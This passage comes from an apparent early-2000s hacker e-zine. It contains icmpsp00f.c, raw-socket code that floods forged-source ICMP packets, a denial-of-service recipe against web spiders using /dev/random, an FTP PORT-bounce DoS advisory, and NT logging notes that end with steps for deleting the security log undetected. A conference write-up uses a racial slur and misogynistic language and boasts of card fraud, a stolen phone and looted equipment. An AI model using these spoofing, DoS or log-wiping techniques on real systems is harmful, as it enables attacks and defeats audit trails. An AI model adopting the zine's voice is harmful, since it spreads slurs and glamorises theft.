^^^^^^^^^^^^^^^
Well since I have explain the tcpsp00f.c and udpsp00f.c this next code,
icmpsp00f.c, should come as no surprise to you.
This will send a simple echo reply with a port unreached message from
255.255.255.255 to 127.0.0.1.
===[ cut here ]===============================================
/* icmpsp00f.c for "Project Sp00fed" by Threx <threx@attrition.org> */
/* compile: gcc -o icmpsp00f icmpsp00f.c */
/* needed header files */
#include <stdlib.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netinet/in_systm.h>
#include <unistd.h>
#include <string.h>
#include <arpa/inet.h>
#include <linux/ip.h> /* instead of using netinet/ip.h we use linux/ip.h */
#include <linux/icmp.h> /* so this will only work on linux */
/* define the constants */
#define error -1
#define srcip "255.255.255.255" /* source address */
#define dstip "127.0.0.1" /* destination address */
#define dabuf (sizeof(struct icmphdr) + sizeof(struct iphdr))
main() {
struct iphdr *iphdr;
struct icmphdr *icmphdr;
u_char buff[dabuf];
struct sockaddr_in target;
struct in_addr saddr, daddr;
int sock, on = 1;
if ((sock = socket(AF_INET,SOCK_RAW,IPPROTO_RAW)) == error) {
printf("socket error\n");
exit(1);
}
if(setsockopt(sock,IPPROTO_IP,IP_HDRINCL,&on,sizeof(on)) == error) {
printf("setsockopt error\n");
exit(1);
}
iphdr = (struct iphdr *)buff;
icmphdr = (struct icmphdr *)(buff + sizeof(struct iphdr));
bzero((char *)iphdr,sizeof(struct iphdr));
bzero((char *)icmphdr,sizeof(struct icmphdr));
saddr.s_addr = inet_addr(srcip);
daddr.s_addr = inet_addr(dstip);
/* let's build a packet */
iphdr->ihl = 5;
iphdr->version = 4; /* this will always be 4 */
iphdr->tot_len = sizeof(struct iphdr) + sizeof(struct icmphdr);
iphdr->id = 1234;
iphdr->ttl = 250; /* a length of time the packet will survive
*/
iphdr->protocol = 1;
iphdr->saddr = saddr.s_addr; /* source address */
iphdr->daddr = daddr.s_addr; /* destination address */
iphdr->check = 0;
icmphdr->type = 0; /* this is an echo reply */
icmphdr->code = 3; /* this code means the port wasn't reached */
icmphdr->un.echo.sequence = htonl(rand());
icmphdr->un.echo.id = htonl(rand());
icmphdr->checksum = 0;
memset(&target,'\0',sizeof(target));
/* now let's send this packet */
printf("sending packet: ");
while (1)
if (sendto(sock,(char *)buff,sizeof(buff),0x0,(struct sockaddr *)&target,
sizeof(target)) != sizeof(buff)) {
printf("packet wasn't sent\n");
exit(1);
}
else {
printf("packet sent\n");
}
exit(0);
}
===[ done ]===================================================
6.0 Reference
^^^^^^^^^^^^^
Socket Programming:
http://www.ecst.csuchico.edu/~beej/guide/net/
IPv4:
rfc791 = Internet Protocol
rfc1349 = Type of Service in the Internet Protocol Suite
TCP:
rfc793 = Transmission Control Protocol
rfc1323 = TCP Extensions for High Performance
UDP:
rfc768 = User Datagram Protocol
ICMP:
rfc792 = Internet Control Missage Protocol
rfc1256 = ICMP Router Discovery Messages
rfc1788 = ICMP Domain Name Messages
[KV10's 30 Second Useful Script]=================================[Digital Ebola]
Looking at open Windows shares? Tired of typing all that samba crap? Or maybe
you just can't remember how to type samba stuff? Well, this issue's 30 second
script may just for you. You need to have Samba tools installed, and a program
called NBTscan. In case you never heard of either, Samba is a set of utilities
that allows you to view and mount Windows shares. It could be one of the best
pieces of reversed engineering that has ever came from the Linux community.
NBTscan is a binary that will query the NetBIOS of a Windows machine, and obtain
its NetBIOS name, MAC address, and the login name of the current user. Both
Samba and NBTscan can be obtained at http://www.freshmeat.net.
#!/bin/bash
echo ------------------------------------------------------------------------
echo WINCHECK 1.0 by Digital Ebola -digi@legions.org-
echo ------------------------------------------------------------------------
echo
echo
echo Enter IP address:
read IP
nbtscan $IP
echo
echo Enter NetBIOS name:
read NAME
smbclient -L $NAME -I $IP
echo
echo Enter share to mount:
read SHARE
smbmount //$NAME/$SHARE /mnt -o ip=$IP
echo
echo ------------------------------------------------------------------------
[Booty Con 2000, An Account of the Hackercon Rubicon]===================[sodium]
Prequel:
The MOB had envisioned plans to attend Rubi Con 2000 since the first con had
happened in 1999. For a variety of reasons the group was unable to attend the
99 convention, but that just made our drive to reach the con stronger. The
intital planning started rolling about 2-3 months before the con was
scheduled. The word was spread among the group and interest was sparked. A
month before the con was sheduled members Tophat, sodium, Tradeser, Jouser,
and 2ezy were all planning on going, along with other local 513 people. The
plan was that sodium would drive his "fly ride" and pick up Tophat and Jouser
along the way. Two other local kids, Godlike and Lordsomer, were going to
hitch a ride with sodium as well. About 2 weeks before the con tophat tried
to contact sodium to formalize the plans and found that sodium's telephone had
been disconnected (thanks ma bell). This caused some waves in our plans.
Right about this time as well, 2ezy informed Tophat that he was going to leave
his wife, which happened to be the only way that allowed him to remain in the
country, and that he was going to hitchhike to Tophat's dorm room where he
would live and avoid the INS officers. Resulting in this, since he would be
leaving his wife (who is a truckdriver) he would not have any means to make it
to the con (he can't drive). minus one member. In order to get in contact
with sodium, Tophat had MOB member DJ Ohki leave a note on sodium's apartment
door that read, "Call Tophat ASAP 556-####". Tophat, upon recieving the call
from sodium learned that sodium had broken up with his fiance, who was
cheating on him, and that she had moved out. Without her there to give him
mad head he sat naked in front of his computer until his telephone was cut off
for not paying any bills. He had also pawned his engagement ring to pay the
insurance for his "fly ride". Last minute plans were made, usually on the
payphone outside of sodium's apartment, for the con. About this time Jouser
informed Tophat that he most likely would not be able to attend the con on
account of him being scared of us. Another member down. 2:00 AM the NIGHT
before the convention, sodium calls and wakes up Tophat and informs him that
he only has $0.88 to his name. Tophat, while still more or less asleep,
agrees to help pay sodium's way but encourages sodium to get the money "some
way". Sodium contemplates knocking off a 24hr liquor store or pawing his
computer. Tophat explains to sodium that it would be useless to pawn his
computer to go to a computer convention. 7:00 am the day of the con sodium
calls up Tophat and informes him that he had scammed $100 off of his mom's
debit card and that he would be right over to pick up the other people to go
to the con.
DAY ONE:
Sodium is late picking up Tophat but eventually arrives and then they drive
over to LordSomer's house where he and Dynamis are waiting, they switch
cars and gear and start off. The car ride was pretty boring. The car ride is
about 6-7 hours and with pretty bland scenery. About 4-5 hours into the trip
Dynamis remarkes, "I'm glad that I drove up here instead of sodium, I really
needed to get some experience on the express way." Lordsomer, Tophat, and
sodium all look at each other. To make matters worse the hotel changed their
name two days before the con, without anyone knowing. so instead of looking
for the "Wyndam" hotel, we were supposed to be looknig for the "Clariton". We
had to have passed by the hotel about 20 times. During the course of us
driving past the correct hotel, dynamis' car started making funny sounds. We
pulled over, called AAA, and waited until Snoop doggy dogg's long lost twin
brother arrived in a tow truck and took our car (he didn't steal it, although
we thought that he did after we arrived at the car station before he did). We
then found the right hotel and procedded to check in for the con, after check
in we picked up our car (it had a loose bolt in the right-front tire). We
walked back to the hotel and setup in the network room. At this time we began
to realize how much this con would suck. The whole con had about 7 people
walking around. Out of the 7 people we notices a guy dressed in a bussiness
suit and sodium was like "Niggaz, thats a fed.". We thought, "well, maybe its
early..it will get better...." We met up with Tradeser who had reserved the
hotel rooms for us and went back to the hotel and checked into our rooms.
Then back to the con for corporate level - inspirational talk filled with
buzzwords like "revolution" "going past the the edge" and "putting books on
the shelf". I can't even remember what other talks were given that night,
they must have been really interesting to say the least. The social
engineering contest, for which we were a sure win, was canceled because the
con organizers couldn't figure out how to setup a pbx. When we got back to
the hotel we basically fucked around with the camera and drank.
DAY TWO:
We slept until about noon and then went over to the con we missed
the first two talks of the day but made it in time to catch the "into to
networking and tcp/ip" talk. Sodium is still asleep at this point. This guy's
talk bascially consisted of reading tcp/ip vocab words off of a powerpoint
projection. We got up and walked out. TDYC!, a group which was scheduled to
give a few talks over the course of the con, never showed up and their talks
were canceled. Then we fucked around in the LAN room, waiting for them to get
the DHCP/ISDN line up so that we could connect our computers together. The
red v. blue hacking contest had been virtually canceled, the blue defense
boxes were taken off line. The "hacking contest" ending up being a bunch of
kids installing sniffers on the local dhcp network and other people going
around to other people's computers and giving themselves root accounts from
console. Then we went off to listen to a talk by one of the con organizers
about "Failsafe Computing". After waiting around for about 45 min. we were
told that he was still sleeping in his room. After that we went back to the
hotel and just fucked around a bunch. After fucking around for a bit and
chilling at the beach-themed bar at the hotel and waking sodium's ass up, we
headed back to the con. After wasteing about an hour or so phreaking the
payphones and getting sniffed in the LAN room, we went to a talk given by Tim
Cothers. He gave a talk on the anatomy of an internet attack, which basically
consisted of him breaking into a NT box remotely. This was the best talk at
the con (Tradeser took notes, hehe). Laster that night there was the the 2nd
round of hacker jeapordy, or what they called "Win NFF's Shirts". Tophat,
Lordsomer, and Tradeser made up the mobsters.net team and went up against 2
other teams made up of various people at the con. We absolutely got wh00ped.
The score was something similar to team #1: 21,000 pts. team #2: 7,000 pts.
mobsters.net: 0 pts. Aparantly team 1 had some crazy smart guy who won round
one, the con organizers then purposely made round 2 nearly impossible to try
to stump this guy (which with 21,000 pts. didn't work too well). Then, out of
pity for not scoring any points, the mobsters.net team was allowed to advance
to the final round, and sodium jumped in for some fun. We placed second in
this, losing by a mere 1,000 pts. or so. This was kinda of fun, but overly
rowdy with Lordsomer throwing objects at the guy who was asking questions.
During the middle of the game, Rev. George, a team #2 member told everyone to
quiet down. Aparently during the commotion of the game he had lost his cell
phone. He borrowed his friend's phone so that he could ring his phone and
find out where it is. To little surprise, sodium's coat pocket starts
ringing. I mean seriously sodium, you should have taken the battery out. He
handed over the phone and we continued the game. During the course of the
whole day, Tradeser's friend had been chilling in the bar over at our hotel
and the bar at the hotel where the con was being held. All day she had been
drinking and talking to people. Apparently she had told everyone that she met
that there would be a party in room 303 (our room), and that everyone was
invited. We had absolutely no problem with this and continued to spread the
word. Sodium and Tophat headed back to the room for the party (the rest of
our crew just wanted to goof around on the 1kps lan...what party poopers!).
We get to our room and find it filled with about 20 guys and 1 girl,
Tradeser's friend.
(note by sodium: Look, I was going to pimp on this girl hardcore, but this
little bitch "Eric Son" was mack'n her ass on the bed. Just cause he can do a
rubix cube in 2 min, doesnt make him a mackdaddy, niggaplease.) Then to make
things worse, no one brought any booze. So we start talking to some guy who
agrees to go and get a keg and bring it back to the other hotel. So we head
back to the other hotel about a half an hour later to try and find our keg
guy. When we get there we find that he didn't come through. So we find some
friends of ours and go on a beer run. All brew was paid for by NFF, wow, what
a guy! We head back to the hotel all ready to go and find a party going on in
another room. Sodium and tophat continued to get drunk and party w/ various
people from the con. Sodium and Bobonic are both trying to get on some nasty
girl who kept showing everyone here tits while the rest of the room was playing
poker and watching lesbian porn.
(sodium's note: it was good porn, and we even had a naked chick, btw, she
wasnt that nasty.)
Sodium heads back to the hotel and enrout trys to pick up another skanky
girl. (sodium's note: This bitch had it going on, like, ghetto bootie) Tophat
scams some money off the drunk people there and heads back to the LAN room.
The LAN room was dead so he went back to the hotel and ended the night.
DAY THREE:
We woke up late, but realize that all of the talks that we would have missed
did not happen. Most people were unplugging all of their shit in the LAN
room and packing up their computers to go home. We went to listen in on the
debate over which OS sucks least. While we were waiting for the to get
started NFF pulledo ut his cell and started asking the crowd for numbers to
prank call. After calling random shit sodium shouts out the phone number of
his ex fiance. What were you thinking man, how in the world could this end up
good? (sodium's note: I was thinking free phone sex, plus i was still drunk)
NFF called her up and explained that we were bored and had to kill some time
and asked if she had any funny stories about Sodium. NFF would then try to
relay whatever she said over the crowd's laughter. She told how Sodium had
gotten drunk off of 2 Zimas and then after only 2 insertions, he fell alseep
inside of her in their moment of intimacy, how she supported his broke ass,
and how he would sit naked on his beanbag and irc all day while she worked and
cooked. (total bullshit) Then she told how she would have Sodium wear dresses
and girl accessories to turn her on. (it was halloween) sod was blood red. To
get back at her sod told a story about how he had made her "baaaaa" like a
sheep in the bedroom or something freaky like that. Sod was yelling his story
to NFF who was relaying it to sod's ex. The crowd was just dying. Then,
Sodium runs up and grabs the phone and whispers "I'm sorry, I'm at a computer
con and they're making me do this.." (I was still wanting some pootang) After
the laughter died down, the crowd said their goodbyes and the debate was
started. LordSomer and Sodium took the side of linux as sucking the least,
and while they put up a good fight, Win 9x took the cake (only because these
guys had the balls to represent win 9x at a hacker con). After the debate we
grabbed some loot that was lyring around the LAN room (we came out with about
20 CDs of software, a leatherman tool, keys to a payphone, a swappabl 1 gig HD
and a 120 mb HD, phone books, and a bunch of other stuff). We then got a
quick pic with the fed who had been following us around the whole con
(viewable on our webpage), and then we headed out to the car. We didn't stay
for the closing ceremonies. The drive home was pretty boring, sodium and
tophat made calls to Jouser and other MOB members to make the ride go faster.
This included sodium scareing Jouser so bad he cryed to his mommy. That ended
our rubi-con adventure. The experience was fun, but the con sucked dick. I'll
just save my money and check out HOPE or defcon next time.@
Outro:
Yo, this is sodium, ok.. a good side note to this is, the night after
the con, my exgirlfriend came up to my apartment, and tryed to tell me that
what i did at the con was very immature and stupid. I basicaly kicked her out
on her ass, and told her to go away. And I would also like to state for the
record that I am not gay.
-sodium
[Spider DoS]=============================================================[fejed]
Denial of Service Attack Against remote http Spidering/Mirroring Software.
Basically, Spidering and Mirroring programs request robots.txt to set quotas
for transfering files, for example only 2 files per hour or something like
that.
To perform this Denial of Service attack, you will require one unix
based operating system, eg OpenBSD that runs a http daemon which can follow
symbolic links. Once you have got your webserver up, you'll need to
symbolically link a device that outputs random data (for example at the time
of writing this, I would use /dev/random or an alternative such as
/dev/prandom, /dev/urandom, /dev/srandom etc..) to robots.txt in the Document
root path (The path on the filesystem that the httpd treats at / for requests)
which would be accessed as http://yourserver/robots.txt.
Now, there are a few ways to perform this attack one being is to submit your
host to a search engine, like yahoo. When your site is spidered by yahoo the
computer that is spidering your site, will ask for robots.txt. What happens
when they ask for robots.txt? The server that is spidering your computer will
recieve randomdata untill it is unable to handle the amount it has recieved
due to lack of endless resources. ;-)
The second way to perform an attack using the set up unix based system would
be to have access to a unix based system on a normal user level not super user
and use a tool such as wget to carry out the denial of service attack on the
computer that you are issuing the mirroring to do be done from.
I'm sure there are a few other things you could do with this attack, so use
your mind and discover as I do.
[File Transfer Protocol Advisory]========================================[fejed]
In writing this Advisory I'm assuming you are familiar with the protocol
in it's self a little bit. As standard all ftp daemons are forced to include
use of the "PORT" command. This function of the protocol is used to set up the
data transfer ports in between the user and the server. The ftp protocol
includes support for files to be transfered to a third part host, to a terminal
or printer that may not be able to make use of the file transfer protocol
directly.
So far I've explained how the PORT command is used properly to some effect.
If you wish to have a deeper insight into the File Transfer Protocol and
its syntaxes then please refer to rfc 959.
Now the problem arises where anyone has the ability to transfer files to a
third party host, you may think there is nothing wrong with this at all.
Yet you are wrong, why? Well easy, by issuing the port command i can send
files and directory listings to just about any remote server with a tcp
port open. If we transfer large amounts of data accross high speed
networks numerous times simutaniously we will be creating a Denial of
Service attack against any choosen host. I'm not going to include the
exact syntax in this article for all you script kiddies out there. There
are many possibilities out there that you could use inconjuction with this
attack to maximise its effect greatly, those I will not publish because it
most likely will goto misuse, even though anyone with half a clue about
how the file transfer protocol works would be able to easily see the
hazards possible.
I've thought of a fix so everyone doesn't have to engage in a flurry of
wasting money and time on clueless idiots that have degrees and what
not.. *shut up fejed*.
This fix should be included in the next update of the ftp rfc; Users
connecting to the service side of the protocol should NOT be allowed to
issue the port command to set up the transfer data to be sent to ports
that are listed in /etc/services or something similar to avoid the
potential denial of service attack happening. If you can't implement this
fix effective immediate then I suggest removing anonymous login so that
your ftp daemon is not used in conjunction with others to create a
DDoS/DoS attack against other hosts.
[Women in Technology]===================================================[Godess]
I recently read an article that I found quite disturbing. The article
stated that according to a study by a North American Woman's University,
females are being driven away from technology because they're intimidated
by the amount of "geeky" men in the industry. I don't know where they
based their facts from, but are women really that shallow?
Are women really willing to stop themselves short just because the people they
work with know more than they do? Perhaps its because women are intimidated by
the lack of respect given women in the industry, Or could it be that they don't
feel capable to learn at the same capacity as men do regarding technology.
I believe that most women are afraid of learning technology because it's a
high paced, fast moving industry. I'll admit it's hard to keep up, but If
you keep focus in certain areas of technology (i.e. network security,
networking, etc...) It can be done. I'm not saying that today's growing
technology is not overwhelming, But isn't it exciting? Wouldn't it be
great to discover something totally un-touched then release it to the
world knowing you've made a diff
erence by learning and manipulating
technology to benefit the rest of the community? Be it exploits or
patches or simple protocol manipulation and variations there of.
Any one of these things can affect the whole way certain technologies are
viewed and standardized.
I know for a fact that there ARE women in technology, very bright and
enlightened women. These women are making history, discovering new ways
to use technology to benefit the rest of us. Not only are they making
history and discoveries, but they're protecting our technology. People
say "Hackers" are criminals, they also say "Hackers" are without ethics,
without integrity, and without conscious. However, does it make sense for
a Hacker to be out to destroy the one thing that breathes life into
him/her? Technology. That's right, and women have to keep up. The day is
not far when we will see typical female professions being taken over by
technology. The time is already at hand. There's no longer a need for
telephone operators, most companies throughout corporate america run
computer automated phone systems. Soon there will be no need for
Secretaries, Nurses, Bankers, etc....Its all going ONLINE! You can't even work
at Fast-Food establishments without knowing at least something about
technology, all registers now in days are computerized for
efficiency. Why cant women take advantage of this? Why are there not
more women in technology? Because they're scared. Not by "geeky" men, but
of themselves and their limitations. Myself and My sisters in the
community are doing all we can to make the industry a better place for
women, all they have to do is apply themselves.
The women involved in technology are not "geeks" nor are we anti-social, we're
no less beautiful than a waitress, or secretary. We have lives outside of
our computers. Only difference between us and other women is the drive to
make a major difference in a world that's still new and being
discovered. Other women can do it too, and hopefully will take the
initiative someday.
**Mad Props and Greets go to**: `immortal, WWsBabe, mo||y, baybee, and
jennicide. Women who are not afraid.
/* Editors Rant: Before you look at the above article, and say, "Gosh thats
lame, Legions posted a girly article" think about this. Think about all the
times you have wished to find a female in your industry, just so that you would
have something to talk about. I have personally had the pleasure of working
with Godess, and now know that women need every piece of encouragement they can
get. I would have not known the difference between a scene whore and a brilliant
woman, if I had not listened to what she and a few others have said to me.
I will encourage more women to write for Keen Veracity, as we are a forum for
everyone.
*/
[Expecting Mass Commands]========================================[Digital Ebola]
Ah. About a half a year ago, I started working for a new company that has
deployed alot of Linux servers. At the time that I came into it, we had maybe
120 servers total, and now we are up to almost 900, constantly adding more.
My first task was to script something that would change the passwords on
everything in a hurry. I had a deadline (the next morning) and was frantic.
I had never heard of TCL/Expect up until this point. It did not take me very
long to be turned on to it.
Expect is a small utility, that allows interaction thru scripting. There are
many utilities that require user interaction to run (telnet, ftp, ssh).
Expect allows you to "fill in the blanks" automatically, so that you may
be able to run your script, and walk away.
Included with the Expect source, are examples of various scripts. I found
"passmass" and it was the exact answer to my problem. I then took that script
and worked it over so that it would be friendly with RedHat. Since then, I have
been playing more with Expect and find it to be a very powerful tool, and
it always works in a pinch. This is how Admin came to be. I needed to not only
change passwords, but also do alot of other things, with a lot of hosts.
I built this off my modified script, based off the original passmass. The
result is a solution that has saved countless hours of "server touches".
I now give this script to the public, may it be used for GOOD purposes.
I do realize that with a little modification, it could launch the Internets
version of world war 3. (300 hosts, ping -f starting remotely, ahem).
This will work with Redhat 6 and above. Anything else, and you will need to
modify it. Have fun, and read about about Expect!
#!../expect --
#Mass Admin v1.0 by Digital Ebola <digi@legions.org>
#Based on the passmass script by Don Libes
#COMMENTS: I dont really know if there was a example like this or not, I was
#in a pinch to execute certain commands over a large number of hosts.
#I basically took the passmass script and expanded it. If theres any bugs in
#this, its becuase I thru it together in a hurry. This is tested on
#Redhat 6.1 anything else might not work, so you might have to learn a lil
#bit of expect :)
#To run: you can either do it at the command line as
# expect admin host1 host2 host3 or write a little script to do it for you if
#you have a lot of hosts.
exp_version -exit 5.0
if {$argc==0} {
send_user "usage: $argv0 host1 host2 host3 . . .\n"
exit
}
expect_before -i $user_spawn_id \003 exit
proc badhost {host emsg} {
global badhosts
send_user "\r\n\007$host not modified.- $emsg\n\n"
if {0==[llength $badhosts]} {
set badhosts $host
} else {
set badhosts [concat $badhosts $host]
}
}
# This needs to be set to 1 to su.
set su 0
send_user "Enter Login Method: "
expect_user -re "(.*)\n"
set login $expect_out(1,string)
send_user "\n"
if {!$su} {
send_user "Program to execute: "
expect_user -re "(.*)\n"
set program $expect_out(1,string)
send_user "\n"
send_user "user id: "
expect_user -re "(.*)\n"
send_user "\n"
set user $expect_out(1,string)
stty -echo
send_user "Login password: "
expect_user -re "(.*)\n"
send_user "\n"
set password(login) $expect_out(1,string)
} else {
send_user "Program to execute: "
expect_user -re "(.*)\n"
set program $expect_out(1,string)
send_user "\n"
send_user "user id: "
expect_user -re "(.*)\n"
send_user "\n"
set user $expect_out(1,string)
stty -echo
send_user "login password: "
expect_user -re "(.*)\n"
send_user "\n"
set password(login) $expect_out(1,string)
send_user "root password: "
expect_user -re "(.*)\n"
send_user "\n"
set password(old) $expect_out(1,string)
}
stty echo
trap exit SIGINT
#if you have major probs, you might have to set the timeout differently
set timeout 15
set badhosts {}
for {set i 0} {$i<$argc} {incr i} {
set arg [lindex $argv $i]
switch -- $arg "-user" {
incr i
set user [lindex $argv $i]
continue
} "-prompt" {
incr i
set prompt [lindex $argv $i]
continue
} "-rlogin" {
set login "rlogin"
continue
} "-slogin" {
set login "slogin"
continue
} "-telnet" {
set login "telnet"
continue
} "-program" {
incr i
set program [lindex $argv $i]
continue
} "-timeout" {
incr i
set timeout [lindex $argv $i]
continue
} "-su" {
incr i
set su [lindex $argv $i]
continue
}
set host $arg
if {[string match $login "rlogin"]} {
set pid [spawn rlogin $host -l $user]
} elseif {[string match $login "slogin"]} {
set pid [spawn slogin $host -l $user]
} elseif {[string match $login "ssh"]} {
set pid [spawn ssh $host -q -l $user]
} else {
set pid [spawn telnet $host]
expect -re "(login|Username):.*" {
send "$user\r"
}
}
if ![info exists prompt] {
if {[string match $user "root"]} {
set prompt "# "
} else {
set prompt "(%|\\\$|#) "
}
}
set logged_in 0
while {1} {
expect "*assword*" {
send "$password(login)\r"
} eof {
badhost $host "spawn failed"
break
} timeout {
badhost $host "could not log in (or unrecognized prompt)"
exec kill $pid
expect eof
break
} -re "incorrect|invalid" {
badhost $host "bad password or login"
exec kill $pid
expect eof
break
} -re $prompt {
set logged_in 1
break
}
}
if (!$logged_in) {
continue
}
if ($su) {
send "su -\r"
expect "Password:"
send "$password(old)\r"
expect "# "
send "$program\r"
} else {
send "$program\r"
}
expect "$prompt"
send_user "\n"
}
if {[llength $badhosts]} {
send_user "\nfailed to execute command on $badhosts\n"
}
[NT Logging]============================================================[NtWak0]
+-----------------------------------------------------------------------------+
|Author : NtWaK0 |
|Crew : Legions Of the Underound |
|Subject: NT LOGGING |
|Date: Sep-3-2000 |
+-----------------------------------------------------------------------------+
INTRODUCTION
============
Many peoples asked me about NT and where are THESE logs,so here we go
something I can think of about NT monitoring that will help NT admins and
others peoples too :)
First Let US Start With a Breif Description Of NT Logs.
NT LOGS DESCRIPTION
===================
Thier is no magic in NT logs like the UNIX logging.To manager you NT logs
you have to use "Event Viewer".
What is "Event Viewer", WELL IF YOU CLICK THE HELP IN NT VIEWER you will get
a nice description.:
Event Viewer is the tool you can use to monitor events in your system. You
can use Event Viewer to view and manage System, Security, and Application
event logs. You can also archive event logs. The event-logging service
starts automatically when you run Windows NT.
You can stop event logging with the Services tool in Control Panel.
Let me comment on this last phrase from MS HELP "You can stop event logging
with the Services tool in Control Panel" WELL IT IS NOT TRUE, YOU CANNOT
STOP EVENT VIEWER WHILE YOU ARE RUNNING NT. WHAT YOU CAN DO IS DISABLE IT
THAT MEAN NEXT TIME YOU REBOOT THE EVENT VIEWER SERVICE WILL BE STOPED.
So to resume you cannot STOP EVENTLOG from the GUI you can only disabled it
and from the command line you will get this :
----------------------------------------------[NET STOP EVENTLOG DUMP]------
C:\>net stop EVENTLOG
The requested pause or stop is not valid for this service.
More help is available by typing NET HELPMSG 2191.
C:\>NET HELPMSG 2191
The requested pause or stop is not valid for this service.
EXPLANATION
This command is invalid for this service, or the service cannot accept the
command right now.
ACTION
If the service normally accepts this command, try typing it
again later.
----------------------------------------------------------------------------
LOGS TYPE
=========
The three types of NT event logs are:
System log
----------
Tracks miscellaneous system events, e.g. tracks events during system startup
and hardware and controller failures.
Application log
---------------
Tracks application related events, e.g.applications generate informational
such as failing to load a DLL will appear in the this log.
Security log
------------
Tracks events such as logon, logoff, changes to access rights, and system
startup and shutdown.
By default like i said you will see later in this paper that the security
log is turned off by default.
LOGS LOCATION AND ENABLING
==========================
The location of NT logs is :
%SYSTEMROOT%\system32\config\SysEvent.Evt
%SYSTEMROOT%\system32\config\SecEvent.Evt
%SYSTEMROOT%\system32\config\AppEvent.Evt
By default NT DOES not log all the event.You have to enable auditing, to do
so follow these steps :
1- From the Start Menu, choose Program and then Administrative
Tools (Common). From the Administrative Tools submenu, choose User
Manager,
which displays the User Manager window.
2- From User Manager Menu Click POLICIES then Click Audit, the Audit policy
windows appeare
3- Select the Radio Box "Audit These Events"
4- Select what you want and Click OK and Close User Manager :)
NOTE: If you decide to Audit all event you better HAVE SOME KICK ASS MACHINE
cause this is going to suck a lot of resources
Auditing of Privileges
======================
Certain privileges in the system are not audited by default even when
auditing on privilege use is turned on. This is done to control the growth
of audit logs. The privileges are:
1- Bypass traverse checking *** To Rveryone ***
Is granted to everyone so is meaningless from auditing perspective
2- Debug programs *** To Administrators ***
Not used in a working system and can be removed from administrators group
3- Create a token object *** To NO One ***
Should not be granted to anyone
4- Replace process level token *** To NO One ***
Should not be granted to anyone
5- Generate Security Audits *** To NO One ***
Should not be granted to anyone
6- Backup files and directories *** To Administrators Backup Operators. ***
Used during normal system operations
7- Restore files and directories *** To Administrators Backup Operators. ***
Used during normal system operations
To enable auditing of these privileges, add the following key
Hive: HKEY_LOCAL_MACHINE\SYSTEM
Key: System\CurrentControlSet\Control\Lsa
Name: FullPrivilegeAuditing
Type: REG_BINARY
Value: 1
Or Create a text file call it audit.reg and cut and past the lines below
-----------------------------------------------------------[SNIP HERE]------
REGEDIT4
ADD A BLANK LINE HERE
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
"FullPrivilegeAuditing"=hex:01
ADD A BLANK LINE HERE
-----------------------------------------------------------[SNIP HERE]------
To merge the .Reg file Or you double click on it or you open a command
prompt
and you type : REGEDIT /S audit.reg
This will merge the file you have created
Auditing Base Objects
=====================
This registry key setting tells Local Security Authority that base objects
should be created with a default system audit control list
Still the administrator will need to turn auditing on for the
"Object Access" category using User Manager
To enable auditing of base objects, add the following key
Hive: HKEY_LOCAL_MACHINE\SYSTEM
Key: \CurrentControlSet\Control\Lsa
Name: AuditBaseObjects
Type: REG_DWORD
Value: 1
Or Create a text file call it auditObj.reg and cut and past the lines below
-----------------------------------------------------------[SNIP HERE]------
REGEDIT4
ADD A BLANK LINE HERE
[HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa]
"AuditBaseObjects"=dword:00000001
ADD A BLANK LINE HERE
-----------------------------------------------------------[SNIP HERE]------
To merge the .Reg file Or you double click on it or you open a command
prompt
and you type : REGEDIT /S auditObj.reg
This will merge the file you have created
EXAMPLE
=======
What do you see when you enable Security Auditing ?
IN THIS EXAMPLE I DID ENABLE ONLY LOGON LOGOFF FAILURE ONLY
Logon Failure:
Reason: Unknown user name or bad password
User Name: WaKiNg
Domain: WaK0
Logon Type: 3
Logon Process: KSecDD
Authentication Package: MICROSOFT_AUTHENTICATION_PACKAGE_V1_0
Workstation Name: \\BRAINCELL
CLEARING NT LOGS
================
To clear a log, switch to the log you want to clear, on the Log menu click
CLEAR ALL EVENTS a message asks if you want to archive the current events.
If you answer Yes, the SAVE AS DIALOG box appears.
Enter the filename and folder path where you want to store the saved logs
After you answer Yes or No, Event Viewer empties the current log.
Only new events will appear in the log.
NOTE: When you clear the SECURITY LOG an event will SHOW in the Security log
Even if you clean the log you still see this entry :
The audit log was cleared
Primary User Name: SYSTEM
Primary Domain: NT AUTHORITY
Primary Logon ID: (0x0,0x3E7)
Client User Name: WaKiNg
Client Domain: BRAINCELL
Client Logon ID: (0x0,0x2581)
This entry mean you cleared the security event log.
Now if you want to clean the log well you can do the following :
1- Open control panel and then services
2- Locate EVENTLOG service and Click the STARTUP button
3- In Startup Type choose Manual Or Disabled
4- Restart NT
5- Go to %SYSTEMROOT%\system32\config\SecEvent.Evt and delete SecEvent.Evt
By doing so it will stop the eventlog service and you can then delete the
log you are interrested in. :)
TOOLS TO MANAGE NT LOGS
=======================
I use Dumpel.exe from NT resource KIT i am an Old dude who love cmd line :)
If you like cmd line i suggest you Dumpel.exe if not see the links below
And I use NTLast from ntobjectives
Here is an example of what Dumpel.exe will report :
DUMPEL Usage:
dumpel -f file [-s \\server] [-l log [-m source]] [-e n1 n2 n3..] [-r] [-t]
[-d x]
-d <days> Filters for event last days (number larger than zero)
-e nn Filters for event id nn (up to 10 may be specified)
-f <filename> Output filename (default stdout)
-l <name> Dumps the specified log (system, application, security)
-b Dumps a backup file (use -l to specify file name)
-m <name> Filters for events logged by name
-r Filters out events logged by name (must use -m too)
-s <servername> Remote to servername
-t Use tab to separate strings (default is space)
-c Use comma to separate fields
-ns Do not output strings
-format <fmt> Specify output format. Default format is
dtTCISucs
where
t - time
d - date
T - event type
C - event category
I - event ID
S - event source
u - user
c - computer
s - strings
NTLast v2.85
------------
http://www.ntobjectives.com/ntlastv2.htm
Is specifically targeted for serious security and IIS administration.
Scheduled review of your NT event logs is critical for your network.
A server breach can be uncovered by regular system auditing.
Identifying and tracking who has gained access to your system, then
documenting the details is now made easier with NTLast.
This tool is able to quickly report on the status of IIS users, as well as
filter out web server logons from console logons
EventReader
-----------
http://www.strongsoftware.net/eventrd/
EventReader(TM) is an administrative tool which allows network
administrators to analyze and manage event logs. The program lets you
collect event logs from Windows NT computers in a network and store the
information in one or several ODBC compatible databases
(Microsoft SQL Server or Microsoft Access). You can designate the computers
from which to collect the information, and assign a schedule and data
collection and event log backup parameters. The installation package
includes
a Microsoft Access sample database, which contains many queries and reports
for effective event log analysis.
Event Archiver Enterprise
-------------------------
http://www.eventarchiver.com/download.asp
